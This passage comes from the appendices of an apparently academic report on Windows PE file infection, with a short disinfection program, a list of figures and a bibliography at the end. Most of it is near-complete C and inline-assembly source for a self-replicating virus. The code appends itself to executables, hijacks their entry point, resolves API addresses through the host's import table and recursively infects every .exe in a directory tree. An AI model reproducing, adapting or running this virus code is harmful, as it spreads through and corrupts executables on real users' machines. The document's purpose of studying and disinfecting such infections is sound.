275 pars->walkOffsetLL = (DWORD)GetProcAddress(hKernel32, "LoadLibraryA") -addressBaseFunc;

pars->walkOffsetGPA = (DWORD)GetProcAddress(hKernel32, "GetProcAddress")- addressBaseFunc;

// Free libraries.

44 APPENDIX A. INFECTION CODE

FreeLibrary(hUser32);280 FreeLibrary(hKernel32);

return true;}

285 // In pars, set baseFunctionRVAinIAT, walkOffsetLL and walkOffsetGPA.FORCEINLINE bool setLLAndGPA2(Functions *f, Parameters *pars, Constants *

consts, LPBYTE hMap, IMAGE_NT_HEADERS *pNtHeaders,IMAGE_SECTION_HEADER *pFirstSection) {

// Load libraries.HMODULE hUser32 = f->LoadLibrary(consts->user32dll);HMODULE hKernel32 = f->LoadLibrary(consts->kernel32dll);

290 if(!hUser32 || !hKernel32) {return false;

}

// Read imports.295 PIMAGE_IMPORT_DESCRIPTOR pImports = (PIMAGE_IMPORT_DESCRIPTOR)((DWORD)

hMap + Rva2Offset(pNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress, pFirstSection,pNtHeaders->FileHeader.NumberOfSections));

// Look at the import address table of the host.DWORD baseFuncRVA;char* baseFuncName = NULL;

300 while(pImports->Name) {char* s = (char*)((DWORD)hMap + Rva2Offset(pImports->Name,

pFirstSection, pNtHeaders->FileHeader.NumberOfSections));DWORD pImageThunk = pImports->OriginalFirstThunk ? pImports->

OriginalFirstThunk : pImports->FirstThunk;PIMAGE_THUNK_DATA itd = (PIMAGE_THUNK_DATA)((DWORD)hMap + Rva2Offset(

pImageThunk, pFirstSection, pNtHeaders->FileHeader.NumberOfSections));

305 pImageThunk = pImports->FirstThunk;while(itd->u1.AddressOfData) {PIMAGE_IMPORT_BY_NAME name_import = (IMAGE_IMPORT_BY_NAME*)((DWORD)

hMap + Rva2Offset((DWORD)itd->u1.AddressOfData, pFirstSection,pNtHeaders->FileHeader.NumberOfSections));

// Get a any (first) imported function from kernel32.dllif(StringEqualI( s, consts->kernel32dll)) {

310 baseFuncRVA = pNtHeaders->OptionalHeader.ImageBase + pImageThunk;baseFuncName = (char*)name_import->Name;break;

}itd++;

315 pImageThunk += sizeof(DWORD);}pImports++;

}

320 if(baseFuncName == NULL) // if we didn’t find an import from kernel32.dll (e.g. for .NET executables), don’t infect the file

return false;

45

// Set parameters.DWORD addressBaseFunc = (DWORD)f->GetProcAddress(hKernel32, baseFuncName

);325 pars->baseFunctionRVAinIAT = baseFuncRVA;

pars->walkOffsetLL = (DWORD)f->GetProcAddress(hKernel32, consts->loadlibrarya) - addressBaseFunc;

pars->walkOffsetGPA = (DWORD)f->GetProcAddress(hKernel32, consts->getprocaddress) - addressBaseFunc;

// Free libraries.330 f->FreeLibrary(hUser32);

f->FreeLibrary(hKernel32);

return true;}

335

#pragma endregion

#pragma region Infect Exe

340 // Infect another exe.FORCEINLINE int infectExe(Parameters *pars, Constants *consts, Functions *

f, const char *fileName) {PIMAGE_DOS_HEADER pDosHeader;PIMAGE_NT_HEADERS pNtHeaders;PIMAGE_SECTION_HEADER pFirstSection, pLastSection, pSectionHeader;

345 HANDLE hFile, hFileMap;LPBYTE hMap;

int i = 0, charcounter = 0;DWORD oepRva = 0, oep = 0, fsize = 0;

350

// Map file to infect.hFile = f->CreateFile(fileName, GENERIC_WRITE | GENERIC_READ,

FILE_SHARE_READ | FILE_SHARE_WRITE,NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

if(hFile == INVALID_HANDLE_VALUE) {355 return -1;

}

fsize = f->GetFileSize(hFile, 0);if(!fsize) {

360 f->CloseHandle(hFile);return -2;

}

hFileMap = f->CreateFileMapping(hFile, NULL, PAGE_READWRITE, 0, fsize,NULL);

365 if(!hFileMap) {f->CloseHandle(hFile);return -3;

}

370 hMap = (LPBYTE)f->MapViewOfFile(hFileMap, FILE_MAP_ALL_ACCESS, 0, 0,fsize);

if(!hMap) {

46 APPENDIX A. INFECTION CODE

f->CloseHandle(hFileMap);f->CloseHandle(hFile);return -4;

375 }

// Check signatures, to see whether it’s a valid EXE.pDosHeader = (PIMAGE_DOS_HEADER)hMap;if(pDosHeader->e_magic != IMAGE_DOS_SIGNATURE) {

380 goto cleanup;return -8;

}

if(pDosHeader->e_res[0] == 0x424a){385 goto cleanup;

}

pNtHeaders = (PIMAGE_NT_HEADERS)((DWORD)hMap + pDosHeader->e_lfanew);if(pNtHeaders->Signature != IMAGE_NT_SIGNATURE) {

390 goto cleanup;return -9;

}

// Get first and last section.395 pSectionHeader = (PIMAGE_SECTION_HEADER)((DWORD)hMap + pDosHeader->

e_lfanew + sizeof(IMAGE_NT_HEADERS));pFirstSection = pSectionHeader;pLastSection = pFirstSection + (pNtHeaders->FileHeader.NumberOfSections

- 1);

// backup parameters.400 pars->baseFunctionRVAinIAT2 = pars->baseFunctionRVAinIAT;

pars->walkOffsetLL2 = pars->walkOffsetLL;pars->walkOffsetGPA2 = pars->walkOffsetGPA;// Addresses/offsets of library functions.// Fill in the ’base address’ and offsets to LoadLibraryA and

GetProcAddress.405 // This way, we can use those functions even if they are not originally

imported by the host program.if(!setLLAndGPA2(f, pars, consts, hMap, pNtHeaders, pFirstSection)) {

goto cleanup;}

410 // Work out extra size needed in exe, rounded up to be a multiple ofalignment.

// e.g. totalSize = 280, FileAlignment = 200 => sizeNeeded = 400;DWORD alignment = pNtHeaders->OptionalHeader.FileAlignment;DWORD alignedTotalSize = (( (pLastSection->Misc.VirtualSize+consts->

totalSize) / alignment) + 1) * alignment;DWORD sizeIncrease = (alignedTotalSize-pLastSection->SizeOfRawData);

415

// Reload file map and increase the fileSize by what we need to injectour code (respecting the FileAlignment)

// First, clean up old map.f->FlushViewOfFile(hMap, 0);f->UnmapViewOfFile(hMap);

420 f->CloseHandle(hFileMap);

47

// Increase file size.// Note: actual file size increase will be handled by the SetFilePointer

and SetEndOfFile function calls in the clean up section.fsize += sizeIncrease;

425

// Re-create map.hFileMap = f->CreateFileMapping(hFile, NULL, PAGE_READWRITE, 0, fsize,

NULL);if(!hFileMap) {f->CloseHandle(hFile);

430 return -5;}

hMap = (LPBYTE)f->MapViewOfFile(hFileMap, FILE_MAP_ALL_ACCESS, 0, 0,fsize);

if(!hMap) {435 f->CloseHandle(hFileMap);

f->CloseHandle(hFile);return -6;

}

440 // Re-read signatures.pDosHeader = (PIMAGE_DOS_HEADER)hMap;pNtHeaders = (PIMAGE_NT_HEADERS)((DWORD)hMap + pDosHeader->e_lfanew);

// Get first and last section.445 pSectionHeader = (PIMAGE_SECTION_HEADER)((DWORD)hMap + pDosHeader->

e_lfanew + sizeof(IMAGE_NT_HEADERS));pFirstSection = pSectionHeader;pLastSection = pFirstSection + (pNtHeaders->FileHeader.NumberOfSections

- 1);

// Create a place for our viral thread and its parameters, by extendingthe last section.

450 pLastSection->Misc.VirtualSize += consts->totalSize;pLastSection->SizeOfRawData = alignedTotalSize;pLastSection->Characteristics |= IMAGE_SCN_MEM_WRITE |

IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_CNT_CODE;pNtHeaders->OptionalHeader.SizeOfImage = pLastSection->VirtualAddress +

pLastSection->Misc.VirtualSize; // ?? stackoverflow.com/a/8197500

455 // Save original entrypoint.oep = oepRva = pNtHeaders->OptionalHeader.AddressOfEntryPoint;oep += (pSectionHeader->PointerToRawData) - (pSectionHeader->

VirtualAddress);

// Write our code to the last section.460 PBYTE startInjectedCode = (PBYTE)hMap + pLastSection->PointerToRawData +

pLastSection->Misc.VirtualSize - consts->totalSize;MemoryCopy(startInjectedCode, pars, consts->totalSize);// restore parameters from backuppars->baseFunctionRVAinIAT = pars->baseFunctionRVAinIAT2;pars->walkOffsetLL = pars->walkOffsetLL2;

465 pars->walkOffsetGPA = pars->walkOffsetGPA2;

48 APPENDIX A. INFECTION CODE

// Fill in place holders.

*(u_long *)(startInjectedCode + sizeof(Parameters) + sizeof(Constants) +consts->oepOffset) = pNtHeaders->OptionalHeader.ImageBase + oepRva;

*(u_long *)(startInjectedCode + sizeof(Parameters) + sizeof(Constants) +consts->parsOffset) = pNtHeaders->OptionalHeader.ImageBase +pLastSection->VirtualAddress + pLastSection->Misc.VirtualSize -consts->totalSize;

470 *(u_long *)(startInjectedCode + sizeof(Parameters) + sizeof(Constants) +consts->saOffset) = pNtHeaders->OptionalHeader.ImageBase +pLastSection->VirtualAddress + pLastSection->Misc.VirtualSize -consts->totalSize + sizeof(Parameters) + sizeof(Constants) + consts->aStubSize;

// Set new entrypoint.pNtHeaders->OptionalHeader.AddressOfEntryPoint = pLastSection->

VirtualAddress + pLastSection->Misc.VirtualSize - consts->totalSize+ sizeof(Parameters) + sizeof(Constants);

475 // Write our signaturepDosHeader->e_res[0] = (DWORD)0x424a;

// Remove dynamic base if it is usedif( pNtHeaders->OptionalHeader.DllCharacteristics & 0x0040 )

480 pNtHeaders->OptionalHeader.DllCharacteristics ˆ= 0x0040;

cleanup:f->FlushViewOfFile(hMap, 0);f->UnmapViewOfFile(hMap);

485 f->CloseHandle(hFileMap);

f->SetFilePointer(hFile, fsize, NULL, FILE_BEGIN);f->SetEndOfFile(hFile);f->CloseHandle(hFile);

490 return 0;}

#pragma endregion

495

#pragma region Virus Code

// Virus code. This will be copied between EXEs.#pragma code_seg(".viruscode")

500 #pragma data_seg(".virusdata") // Data segment should stay empty, we won’tcopy it.

// Assembly stub. This will be the new entry point of the EXE.// Contains three placeholders, which need to be filled in.__declspec(naked) void AStubStart() {

505 __asm{pushad // preserve our thread context

// Call CStubStartpush 0xCCCCCCCC // parameters: pointer to Parameters, passed to

CStubStart.510 mov eax, 0xCCCCCCCC // sa: address at which CStubStart can be found.

49

call eax

popad // restore our thread contextpush 0xCCCCCCCC // push address of original entrypoint

515 retn // retn used as jmp}

}

// C stub. Main code of our virus.520 // This starts a new thread, and then returns to the original code.

void CStubStart(Parameters *pars) {Constants *consts = (Constants*)((DWORD)pars + sizeof(Parameters));DWORD addrOfSelf = (DWORD)pars + consts->offsetCStubStart;

525 LoadLibraryFun loadLibraryF = (LoadLibraryFun)(*(DWORD*)pars->baseFunctionRVAinIAT + pars->walkOffsetLL);

GetProcAddressFun getProcAddressF = (GetProcAddressFun)(*(DWORD*)pars->baseFunctionRVAinIAT + pars->walkOffsetGPA);

HMODULE user32 = loadLibraryF(consts->user32dll);HMODULE kernel32 = loadLibraryF(consts->kernel32dll);

530 MessageBoxFun msgBoxAF = (MessageBoxFun)getProcAddressF(user32, consts->messageboxa);

CreateThreadFun createThreadF = (CreateThreadFun)getProcAddressF(kernel32, consts->createthread);

msgBoxAF(NULL, consts->text, consts->caption, consts->buttons);

535 DWORD addrOfThreadStart = addrOfSelf + consts->offsetThreadStart;

// Useful if we want to call ThreadStart directly, i.e. not in a newthread:

//ThreadStartFun threadStartF = (ThreadStartFun)(addrOfThreadStart);

540 createThreadF(NULL, 0, (LPTHREAD_START_ROUTINE)addrOfThreadStart, pars,0, NULL);

return;}

// Start of new thread. Will be called by C stub in a new thread.545 DWORD ThreadStart(LPVOID parsVoid) {

Parameters *pars = (Parameters*)parsVoid;Constants *consts = (Constants*)((DWORD)pars + sizeof(Parameters));

LoadLibraryFun loadLibraryF = (LoadLibraryFun)(*(DWORD*)pars->baseFunctionRVAinIAT + pars->walkOffsetLL);

550 GetProcAddressFun getProcAddressF = (GetProcAddressFun)(*(DWORD*)pars->baseFunctionRVAinIAT + pars->walkOffsetGPA);

HMODULE user32 = loadLibraryF(consts->user32dll);HMODULE kernel32 = loadLibraryF(consts->kernel32dll);

555 Functions f;f.MessageBox = (MessageBoxFun)getProcAddressF(user32, consts->

messageboxa);f.CreateThread = (CreateThreadFun)getProcAddressF(kernel32, consts->

50 APPENDIX A. INFECTION CODE

createthread);f.CreateFile = (CreateFileFun)getProcAddressF(kernel32, consts->

createfilea);f.GetFileSize = (GetFileSizeFun)getProcAddressF(kernel32, consts->

getfilesize);560 f.CreateFileMapping = (CreateFileMappingFun)getProcAddressF(kernel32,

consts->createfilemappinga);f.MapViewOfFile = (MapViewOfFileFun)getProcAddressF(kernel32, consts->

mapviewoffile);f.FlushViewOfFile = (FlushViewOfFileFun)getProcAddressF(kernel32, consts

->flushviewoffile);f.UnmapViewOfFile = (UnmapViewOfFileFun)getProcAddressF(kernel32, consts

->unmapviewoffile);f.SetFilePointer = (SetFilePointerFun)getProcAddressF(kernel32, consts->

setfilepointer);565 f.SetEndOfFile = (SetEndOfFileFun)getProcAddressF(kernel32, consts->

setendoffile);f.CloseHandle = (CloseHandleFun)getProcAddressF(kernel32, consts->

closehandle);f.LoadLibrary = loadLibraryF;f.GetProcAddress = getProcAddressF;f.FreeLibrary = (FreeLibraryFun)getProcAddressF(kernel32, consts->

freelibrary);570 f.FindFirstFile = (FindFirstFileFun)getProcAddressF(kernel32, consts->

findfirstfile);f.FindNextFile = (FindNextFileFun)getProcAddressF(kernel32, consts->

findnextfile);

DWORD addrOfCStub = (DWORD)pars + consts->offsetCStubStart;DWORD addrOfInfectDir = addrOfCStub + consts->offsetInfectDir;

575 infectDirFun infectDirF = (infectDirFun)addrOfInfectDir;infectDirF(consts->targetPath,addrOfInfectDir, pars, consts, &f);return 0;

}

580 void infectDir(const char *path, DWORD addrOfInfectDir, Parameters *pars,Constants *consts, Functions *f) {

infectDirFun infectDirF = (infectDirFun)addrOfInfectDir;WIN32_FIND_DATA findData;char searchPath[STR_MAX_LENGTH];

585 char backSlashStar[3]; backSlashStar[0] = ’\\’; backSlashStar[1] = ’*’;backSlashStar[2] = 0;

char backSlash[2]; backSlash[0] = ’\\’; backSlash[1] = 0;

StrCopy(searchPath, path);StrConcat(searchPath, backSlashStar);

590 HANDLE hFind = f->FindFirstFile(searchPath, &findData);

do {// . and ..: skipif (findData.cFileName[0] == ’.’)

595 continue;

// .exe: interestingchar exe[5]; exe[0] = ’.’; exe[1] = ’e’; exe[2] = ’x’; exe[3] = ’e’;

51

exe[4] = 0;if (endsWith(findData.cFileName, exe)) {

600 char exePath[STR_MAX_LENGTH];StrCopy(exePath, path);StrConcat(exePath, backSlash);StrConcat(exePath, findData.cFileName);infectExe(pars, consts, f, exePath);

605 }

// dir: recurseif (findData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) {

char dirPath[STR_MAX_LENGTH];610 StrCopy(dirPath, path);

StrConcat(dirPath, backSlash);StrConcat(dirPath, findData.cFileName);infectDirF(dirPath, addrOfInfectDir, pars, consts, f);

}615 } while (f->FindNextFile(hFind, &findData));

}

// Marker for end of virus code.void VCodeEnd() {}

620

#pragma data_seg()#pragma code_seg()

#pragma endregion625

#pragma region Main

// First generation.630 int main(int argc, char* argv[]) {

PIMAGE_DOS_HEADER pDosHeader;PIMAGE_NT_HEADERS pNtHeaders;PIMAGE_SECTION_HEADER pFirstSection, pLastSection, pSectionHeader;HANDLE hFile, hFileMap;

635 LPBYTE hMap;

int i = 0, charcounter = 0;DWORD oepRva = 0, oep = 0, fsize = 0, parsOffset = 0, saOffset = 0,

oepOffset = 0;

640 // Work out stub size.// Our viral code contains: parameters, constants, assembly stub, C stub

.DWORD aStubSize = (DWORD)CStubStart - (DWORD)AStubStart;DWORD cStubSize = (DWORD)VCodeEnd - (DWORD)CStubStart;DWORD stubSize = (DWORD)VCodeEnd - (DWORD)AStubStart; // Not including

parameters or constants645 DWORD totalSize = stubSize + sizeof(Parameters) + sizeof(Constants);

// Map file to infect.const char *fileName = "PEview.exe";hFile = CreateFile(fileName, GENERIC_WRITE | GENERIC_READ,

FILE_SHARE_READ | FILE_SHARE_WRITE,

52 APPENDIX A. INFECTION CODE

650 NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);if(hFile == INVALID_HANDLE_VALUE) {

printf("[-] Cannot open %s\n", fileName);return 1;

}655

fsize = GetFileSize(hFile, 0);if(!fsize) {

printf("[-] Could not get files size\n");CloseHandle(hFile);

660 return 0;}

hFileMap = CreateFileMapping(hFile, NULL, PAGE_READWRITE, 0, fsize, NULL);

if(!hFileMap) {665 printf("[-] CreateFileMapping failed\n");

CloseHandle(hFile);return 0;

}

670 hMap = (LPBYTE)MapViewOfFile(hFileMap, FILE_MAP_ALL_ACCESS, 0, 0, fsize);

if(!hMap) {printf("[-] MapViewOfFile failed\n");CloseHandle(hFileMap);CloseHandle(hFile);

675 return 0;}

// Check signatures, to see whether it’s a valid EXE.pDosHeader = (PIMAGE_DOS_HEADER)hMap;

680 if(pDosHeader->e_magic != IMAGE_DOS_SIGNATURE) {printf("[-] DOS signature not found\n");goto cleanup;

}

685 if(pDosHeader->e_res[0] == 0x424a){printf("[-] File aleady infected\n");goto cleanup;

}

690 pNtHeaders = (PIMAGE_NT_HEADERS)((DWORD)hMap + pDosHeader->e_lfanew);if(pNtHeaders->Signature != IMAGE_NT_SIGNATURE) {

printf("[-] NT signature not found\n");goto cleanup;

}695

pSectionHeader = (PIMAGE_SECTION_HEADER)((DWORD)hMap + pDosHeader->e_lfanew + sizeof(IMAGE_NT_HEADERS));

pFirstSection = pSectionHeader;pLastSection = pFirstSection + (pNtHeaders->FileHeader.NumberOfSections

- 1);

700 // Copy stub into a buffer.unsigned char *aStub = (unsigned char *)HeapAlloc(GetProcessHeap(), NULL

53

, aStubSize);if (aStub == NULL) {printf("[-] Failed to allocate memory for aStub.\n");goto cleanup;

705 }memcpy(aStub, AStubStart, aStubSize);

// Locate offsets of place holders in assembly stub.for(i = 0, charcounter = 0; i != aStubSize; i++) {

710 if(aStub[i] == 0xCC) {charcounter++;if(charcounter == 4 && parsOffset == 0)

parsOffset = i - 3;else if(charcounter == 4 && saOffset == 0)

715 saOffset = i - 3;else if(charcounter == 4 && oepOffset == 0)

oepOffset = i - 3;} else {

charcounter = 0;720 }

}

// Create parameters and constants.Parameters pars; memset(&pars, 0, sizeof(Parameters));

725 Constants consts; memset(&consts, 0, sizeof(Constants));// Fill in sizes.consts.aStubSize = aStubSize;consts.cStubSize = cStubSize;consts.stubSize = stubSize;

730 consts.totalSize = totalSize;// Fill in offsets of placeholders.consts.parsOffset = parsOffset;consts.saOffset = saOffset;consts.oepOffset = oepOffset;

735 // Fill in strings.strcpy(consts.user32dll, "User32.dll");strcpy(consts.kernel32dll, "Kernel32.dll");strcpy(consts.createthread, "CreateThread");strcpy(consts.createfilea, "CreateFileA");

740 strcpy(consts.getfilesize, "GetFileSize");strcpy(consts.createfilemappinga, "CreateFileMappingA");strcpy(consts.mapviewoffile, "MapViewOfFile");strcpy(consts.copymemory, "CopyMemory");strcpy(consts.flushviewoffile, "FlushViewOfFile");

745 strcpy(consts.unmapviewoffile, "UnmapViewOfFile");strcpy(consts.setfilepointer, "SetFilePointer");strcpy(consts.setendoffile, "SetEndOfFile");strcpy(consts.closehandle, "CloseHandle");strcpy(consts.loadlibrarya, "LoadLibraryA");

750 strcpy(consts.getprocaddress, "GetProcAddress");strcpy(consts.freelibrary, "FreeLibrary");strcpy(consts.messageboxa, "MessageBoxA");strcpy(consts.findfirstfile, "FindFirstFileA");strcpy(consts.findnextfile, "FindNextFileA");

755 strcpy(consts.text, "Hello by Beerend & Janwillem!");strcpy(consts.caption, "Injection result");

54 APPENDIX A. INFECTION CODE

strcpy(consts.targetPath, "C:\\test");consts.buttons = MB_OKCANCEL | MB_ICONQUESTION;// Offsets of functions.

760 consts.offsetCStubStart = sizeof(Parameters) + sizeof(Constants) +aStubSize;

consts.offsetThreadStart = (DWORD)ThreadStart - (DWORD)CStubStart;consts.offsetInfectDir = (DWORD)infectDir - (DWORD)CStubStart;// Addresses/offsets of library functions.// Fill in the ’base address’ and offsets to LoadLibraryA and

GetProcAddress.765 // This way, we can use those functions even if they are not originally

imported by the host program.if(!setLLAndGPA(&pars, &consts, hMap, pNtHeaders, pFirstSection)) {

printf("[-] Failed to set LL and GPA walk offsets.\n");HeapFree(GetProcessHeap(), NULL, aStub);goto cleanup;

770 }

// Work out extra size needed in exe, rounded up to be a multiple ofalignment.

// e.g. totalSize = 280, FileAlignment = 200 => sizeNeeded = 400;printf("Last section virtual size = %i\n", pLastSection->Misc.

VirtualSize);775 printf("Last section raw size = %i\n", pLastSection->SizeOfRawData);

printf("Viral code size = %i\n", totalSize);printf("File Alignment = %i\n", pNtHeaders->OptionalHeader.FileAlignment

);printf("Section Alignment = %i\n", pNtHeaders->OptionalHeader.

SectionAlignment);DWORD alignment = pNtHeaders->OptionalHeader.FileAlignment;

780 DWORD alignedTotalSize = (( (pLastSection->Misc.VirtualSize+totalSize) /alignment) + 1) * alignment;

DWORD sizeIncrease = (alignedTotalSize-pLastSection->SizeOfRawData);printf("Aligned section+viral code size = %i\n", alignedTotalSize);

// Reload file map and increase the fileSize by what we need to injectour code (respecting the FileAlignment)

785 // First, clean up old map.FlushViewOfFile(hMap, 0);UnmapViewOfFile(hMap);CloseHandle(hFileMap);

790 // Increase file size.// Note: actual file size increase will be handled by the SetFilePointer

and SetEndOfFile function calls in the clean up section.fsize += sizeIncrease;

// Re-create map.795 hFileMap = CreateFileMapping(hFile, NULL, PAGE_READWRITE, 0, fsize, NULL

);if(!hFileMap) {

printf("[-] CreateFileMapping failed\n");CloseHandle(hFile);return 0;

800 }

55

hMap = (LPBYTE)MapViewOfFile(hFileMap, FILE_MAP_ALL_ACCESS, 0, 0, fsize);

if(!hMap) {printf("[-] MapViewOfFile failed\n");

805 CloseHandle(hFileMap);CloseHandle(hFile);return 0;

}

810 // Re-read signatures.pDosHeader = (PIMAGE_DOS_HEADER)hMap;pNtHeaders = (PIMAGE_NT_HEADERS)((DWORD)hMap + pDosHeader->e_lfanew);

// Get first and last section.815 pSectionHeader = (PIMAGE_SECTION_HEADER)((DWORD)hMap + pDosHeader->

e_lfanew + sizeof(IMAGE_NT_HEADERS));pFirstSection = pSectionHeader;pLastSection = pFirstSection + (pNtHeaders->FileHeader.NumberOfSections

- 1);

// Create a place for our viral thread and its parameters, by extendingthe last section.

820 pLastSection->Misc.VirtualSize += totalSize;pLastSection->SizeOfRawData = alignedTotalSize;pLastSection->Characteristics |= IMAGE_SCN_MEM_WRITE |

IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_CNT_CODE;//pNtHeaders->OptionalHeader.SizeOfImage += alignedTotalSize;printf("Old SizeOfImage: %i\n", pNtHeaders->OptionalHeader.SizeOfImage);

825 printf("New SizeOfImage: %i\n", pLastSection->VirtualAddress +pLastSection->Misc.VirtualSize);

pNtHeaders->OptionalHeader.SizeOfImage = pLastSection->VirtualAddress +pLastSection->Misc.VirtualSize; // ?? stackoverflow.com/a/8197500

// Save original entrypoint.oep = oepRva = pNtHeaders->OptionalHeader.AddressOfEntryPoint;

830 oep += (pSectionHeader->PointerToRawData) - (pSectionHeader->VirtualAddress);

// Fill in place holders.

*(u_long *)(aStub + oepOffset) = pNtHeaders->OptionalHeader.ImageBase +oepRva;

*(u_long *)(aStub + parsOffset) = pNtHeaders->OptionalHeader.ImageBase +pLastSection->VirtualAddress + pLastSection->Misc.VirtualSize -totalSize;

835 *(u_long *)(aStub + saOffset) = pNtHeaders->OptionalHeader.ImageBase +pLastSection->VirtualAddress + pLastSection->Misc.VirtualSize -totalSize + sizeof(Parameters) + sizeof(Constants) + aStubSize;

// Write our code to the last section.PBYTE startInjectedCode = (PBYTE)hMap + pLastSection->PointerToRawData +

pLastSection->Misc.VirtualSize - totalSize;memcpy(startInjectedCode, &pars, sizeof(Parameters));

840 memcpy(startInjectedCode + sizeof(Parameters), &consts, sizeof(Constants));

memcpy(startInjectedCode + sizeof(Parameters) + sizeof(Constants), aStub, aStubSize);

56 APPENDIX A. INFECTION CODE

memcpy(startInjectedCode + sizeof(Parameters) + sizeof(Constants) +aStubSize, CStubStart, cStubSize);

// Set new entrypoint.845 pNtHeaders->OptionalHeader.AddressOfEntryPoint = pLastSection->

VirtualAddress + pLastSection->Misc.VirtualSize - totalSize + sizeof(Parameters) + sizeof(Constants);

// Write our signaturepDosHeader->e_res[0] = (DWORD)0x424a;

850 // Remove dynamic base if it is usedif( pNtHeaders->OptionalHeader.DllCharacteristics & 0x0040 )

pNtHeaders->OptionalHeader.DllCharacteristics ˆ= 0x0040;

// Clean up.855 printf("[+] Stub written!!\n[*] Cleaning up\n");

HeapFree(GetProcessHeap(), NULL, aStub);

cleanup:FlushViewOfFile(hMap, 0);

860 UnmapViewOfFile(hMap);CloseHandle(hFileMap);

SetFilePointer(hFile, fsize, NULL, FILE_BEGIN);SetEndOfFile(hFile);

865 CloseHandle(hFile);return 0;

}

#pragma endregion

Appendix B

Disinfection code

This code implements the procedure described in 5.6.

#include <Windows.h>#include <iostream>

int main(int argc, char* argv[]) {5 DWORD total_size = 3764;

int aStubOffset = 1172;DWORD oepOffset = 15;

PIMAGE_DOS_HEADER pDosHeader;10 PIMAGE_NT_HEADERS pNtHeaders;

PIMAGE_SECTION_HEADER pFirstSection, pLastSection, pSectionHeader;HANDLE hFile, hFileMap;LPBYTE hMap;

15 int i = 0, charcounter = 0;DWORD fsize = 0;

// Map file to desinfect.const char *fileName = "PEview.exe";

20 hFile = CreateFile(fileName, GENERIC_WRITE | GENERIC_READ,FILE_SHARE_READ | FILE_SHARE_WRITE,

NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);if(hFile == INVALID_HANDLE_VALUE) {printf("[-] Cannot open %s\n", fileName);return 1;

25 }

fsize = GetFileSize(hFile, 0);if(!fsize) {printf("[-] Could not get files size\n");

30 CloseHandle(hFile);return 0;

}

hFileMap = CreateFileMapping(hFile, NULL, PAGE_READWRITE, 0, fsize, NULL);

57

58 APPENDIX B. DISINFECTION CODE

35 if(!hFileMap) {printf("[-] CreateFileMapping failed\n");CloseHandle(hFile);return 0;

}40

hMap = (LPBYTE)MapViewOfFile(hFileMap, FILE_MAP_ALL_ACCESS, 0, 0, fsize);

if(!hMap) {printf("[-] MapViewOfFile failed\n");CloseHandle(hFileMap);

45 CloseHandle(hFile);return 0;

}

// Check signatures, to see whether it’s a valid EXE.50 pDosHeader = (PIMAGE_DOS_HEADER)hMap;

if(pDosHeader->e_magic != IMAGE_DOS_SIGNATURE) {printf("[-] DOS signature not found\n");goto cleanup;

}55

if(pDosHeader->e_res[0] != 0x424a){printf("[-] File not infected\n");goto cleanup;

}60

pNtHeaders = (PIMAGE_NT_HEADERS)((DWORD)hMap + pDosHeader->e_lfanew);if(pNtHeaders->Signature != IMAGE_NT_SIGNATURE) {

printf("[-] NT signature not found\n");goto cleanup;

65 }

// Get first and last section.pSectionHeader = (PIMAGE_SECTION_HEADER)((DWORD)hMap + pDosHeader->

e_lfanew + sizeof(IMAGE_NT_HEADERS));pFirstSection = pSectionHeader;

70 pLastSection = pFirstSection + (pNtHeaders->FileHeader.NumberOfSections- 1);

// Find the jump to the oep in the last section.PBYTE oepPtr = (PBYTE)hMap + pLastSection->PointerToRawData +

pLastSection->Misc.VirtualSize - total_size + aStubOffset +oepOffset;

DWORD oep;75 memcpy(&oep,oepPtr,sizeof(DWORD));

oep -= pNtHeaders->OptionalHeader.ImageBase;

// Get first and last section.pSectionHeader = (PIMAGE_SECTION_HEADER)((DWORD)hMap + pDosHeader->

e_lfanew + sizeof(IMAGE_NT_HEADERS));80 pFirstSection = pSectionHeader;

pLastSection = pFirstSection + (pNtHeaders->FileHeader.NumberOfSections- 1);

// remove our viral code

59

PBYTE writePtr = (PBYTE)hMap + pLastSection->PointerToRawData +pLastSection->Misc.VirtualSize - total_size;

85 memset(writePtr, 0, total_size);

// Modify the section sizes in the last section headerpLastSection->Misc.VirtualSize -= total_size;DWORD alignment = pNtHeaders->OptionalHeader.FileAlignment;

90 DWORD alignedTotalSize = ((pLastSection->Misc.VirtualSize / alignment) +1) * alignment;

DWORD size_decrease = pLastSection->SizeOfRawData - alignedTotalSize;pLastSection->SizeOfRawData = alignedTotalSize;printf("Aligned viral code size = %i\n", alignedTotalSize);printf("Size decrease = %i\n", size_decrease);

95

pNtHeaders->OptionalHeader.SizeOfImage = pLastSection->VirtualAddress +pLastSection->Misc.VirtualSize; // ?? stackoverflow.com/a/8197500

// Restore original entrypoint.pNtHeaders->OptionalHeader.AddressOfEntryPoint = oep;

100

// Remove our signaturepDosHeader->e_res[0] = 0;

// Reload file map and decrease the fileSize to throw away unneededspace in the last sections raw data

105 // First, clean up old map.FlushViewOfFile(hMap, 0);UnmapViewOfFile(hMap);CloseHandle(hFileMap);

110 // Decrease file size.// Note: actual file size decrease will be handled by the SetFilePointer

and SetEndOfFile function calls in the clean up section.fsize -= size_decrease;goto cleanup2;

115 cleanup:FlushViewOfFile(hMap, 0);UnmapViewOfFile(hMap);CloseHandle(hFileMap);

120 cleanup2:SetFilePointer(hFile, fsize, NULL, FILE_BEGIN);SetEndOfFile(hFile);CloseHandle(hFile);return 0;

125 }

List of Figures

3.1 Typical Portable EXE File Layout . . . . . . . . . . . . . . . . . 14

4.1 Screenshots of PEview and CFF Explorer . . . . . . . . . . . . . 184.2 Example of a code cave . . . . . . . . . . . . . . . . . . . . . . . 19

5.1 Structure of the injected code . . . . . . . . . . . . . . . . . . . . 23

6.1 Filesize before and after infection . . . . . . . . . . . . . . . . . 326.2 Infected file, containing (a) our signature and (b) our constant strings 336.3 Greeting of our virus . . . . . . . . . . . . . . . . . . . . . . . . 346.4 Next generation virus . . . . . . . . . . . . . . . . . . . . . . . . 34

60

Bibliography

[1] Detailed Guide To Pe Infection. http://www.rohitab.com/discuss/topic/33006-detailed-guide-to-pe-infection/,December 2008.

[2] Chronicles of a PE Infector.http://tigzyrk.blogspot.fr/2012/09/analysis-chronicles-of-pe-infector.html,September 2012.

